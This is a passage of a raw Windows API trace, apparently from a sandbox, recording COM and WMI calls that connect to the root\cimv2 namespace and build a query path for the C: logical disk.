riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0163.645] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027680, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6030a20) returned 0x0 [0163.645] WbemDefPath:IUnknown:Release (This=0x6027680) returned 0x0 [0163.645] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6030a20) returned 0x0 [0163.645] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0163.645] WbemDefPath:IUnknown:AddRef (This=0x6030a20) returned 0x3 [0163.645] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0163.645] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0163.645] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0x66ce278) returned 0x0 [0163.646] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce278, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0163.646] WbemDefPath:IUnknown:Release (This=0x66ce278) returned 0x3 [0163.646] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0163.646] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0163.646] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0163.646] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x2 [0163.646] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x1 [0163.646] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0163.646] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0163.646] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6030a20) returned 0x0 [0163.646] WbemDefPath:IUnknown:AddRef (This=0x6030a20) returned 0x3 [0163.646] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x2 [0163.646] WbemDefPath:IWbemPath:SetText (This=0x6030a20, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0163.646] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0163.646] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0163.646] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0163.646] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0163.646] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0163.646] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0163.647] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0163.647] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0163.647] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0163.647] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0163.647] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0163.647] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0163.647] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0163.647] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0163.647] IUnknown:Release (This=0xb51e34) returned 0x1 [0163.648] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6027640) returned 0x0 [0163.648] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027640, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0163.648] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027640, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6030a90) returned 0x0 [0163.648] WbemDefPath:IUnknown:Release (This=0x6027640) returned 0x0 [0163.648] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6030a90) returned 0x0 [0163.648] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0163.648] WbemDefPath:IUnknown:AddRef (This=0x6030a90) returned 0x3 [0163.648] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0163.648] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0163.648] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0x66ce2c8) returned 0x0 [0163.649] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce2c8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0163.649] WbemDefPath:IUnknown:Release (This=0x66ce2c8) returned 0x3 [0163.649] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0163.649] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0163.649] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0163.649] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x2 [0163.649] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x1 [0163.649] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0163.649] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0163.649] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a90, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6030a90) returned 0x0 [0163.649] WbemDefPath:IUnknown:AddRef (This=0x6030a90) returned 0x3 [0163.649] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x2 [0163.649] WbemDefPath:IWbemPath:SetText (This=0x6030a90, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0163.649] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a90, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0163.649] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0163.649] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0163.649] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0163.649] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0163.649] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0163.649] IUnknown:Release (This=0xb51e34) returned 0x1 [0163.650] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x601f6c0) returned 0x0 [0163.650] WbemLocator:IUnknown:QueryInterface (in: This=0x601f6c0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0163.650] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f6c0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x6027590) returned 0x0 [0163.650] WbemLocator:IUnknown:Release (This=0x601f6c0) returned 0x0 [0163.650] WbemLocator:IUnknown:QueryInterface (in: This=0x6027590, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x6027590) returned 0x0 [0163.650] WbemLocator:IUnknown:QueryInterface (in: This=0x6027590, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0163.651] WbemLocator:IUnknown:AddRef (This=0x6027590) returned 0x3 [0163.651] WbemLocator:IUnknown:QueryInterface (in: This=0x6027590, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0163.651] WbemLocator:IUnknown:QueryInterface (in: This=0x6027590, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0163.651] WbemLocator:IUnknown:QueryInterface (in: This=0x6027590, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0163.651] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0163.651] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0163.651] WbemLocator:IUnknown:QueryInterface (in: This=0x6027590, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0163.651] WbemLocator:IUnknown:Release (This=0x6027590) returned 0x2 [0163.651] WbemLocator:IUnknown:Release (This=0x6027590) returned 0x1 [0163.651] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0163.651] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0163.651] WbemLocator:IUnknown:QueryInterface (in: This=0x6027590, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x6027590) returned 0x0 [0163.651] WbemLocator:IUnknown:AddRef (This=0x6027590) returned 0x3 [0163.651] WbemLocator:IUnknown:Release (This=0x6027590) returned 0x2 [0163.651] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a90, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0163.651] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0163.651] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0163.651] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x60275f0) returned 0x0 [0163.652] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60275f0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x6033214) returned 0x0 [0165.022] WbemLocator:IUnknown:QueryInterface (in: This=0x6033214, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0x66b26bc) returned 0x0 [0165.022] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66b26bc, pProxy=0x6033214, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0165.022] WbemLocator:IUnknown:Release (This=0x66b26bc) returned 0x1 [0165.023] WbemLocator:IUnknown:QueryInterface (in: This=0x6033214, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0x66b26dc) returned 0x0 [0165.023] WbemLocator:IUnknown:QueryInterface (in: This=0x6033214, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0x66b26bc) returned 0x0 [0165.023] WbemLocator:IClientSecurity:SetBlanket (This=0x66b26bc, pProxy=0x6033214, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0165.023] WbemLocator:IUnknown:Release (This=0x66b26bc) returned 0x2 [0165.023] WbemLocator:IUnknown:Release (This=0x66b26dc) returned 0x1 [0165.023] CoTaskMemFree (pv=0xbd4a38) [0165.023] WbemLocator:IUnknown:Release (This=0x60275f0) returned 0x0 [0165.023] WbemLocator:IUnknown:QueryInterface (in: This=0x6033214, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0x66b26dc) returned 0x0 [0165.024] WbemLocator:IUnknown:QueryInterface (in: This=0x66b26dc, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0165.024] WbemLocator:IUnknown:QueryInterface (in: This=0x66b26dc, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0165.024] WbemLocator:IUnknown:AddRef (This=0x66b26dc) returned 0x3 [0165.024] WbemLocator:IUnknown:QueryInterface (in: This=0x66b26dc, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0165.025] WbemLocator:IUnknown:QueryInterface (in: This=0x66b26dc, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0165.025] WbemLocator:IUnknown:QueryInterface (in: This=0x66b26dc, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0x66b263c) returned 0x0 [0165.025] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66b263c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0165.025] WbemLocator:IUnknown:Release (This=0x66b263c) returned 0x3 [0165.025] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0165.025] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0165.025] WbemLocator:IUnknown:QueryInterface (in: This=0x66b26dc, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0x66b26c4) returned 0x0 [0165.025] WbemLocator:IRpcOptions:Query (in: This=0x66b26c4, pPrx=0x66b26dc, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0165.025] WbemLocator:IUnknown:Release (This=0x66b26c4) returned 0x3 [0165.025] WbemLocator:IUnknown:Release (This=0x66b26dc) returned 0x2 [0165.025] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0165.025] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0165.025] WbemLocator:IUnknown:QueryInterface (in: This=0x66b26dc, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x6033214) returned 0x0 [0165.025] WbemLocator:IUnknown:AddRef (This=0x6033214) returned 0x4 [0165.026] WbemLocator:IUnknown:Release 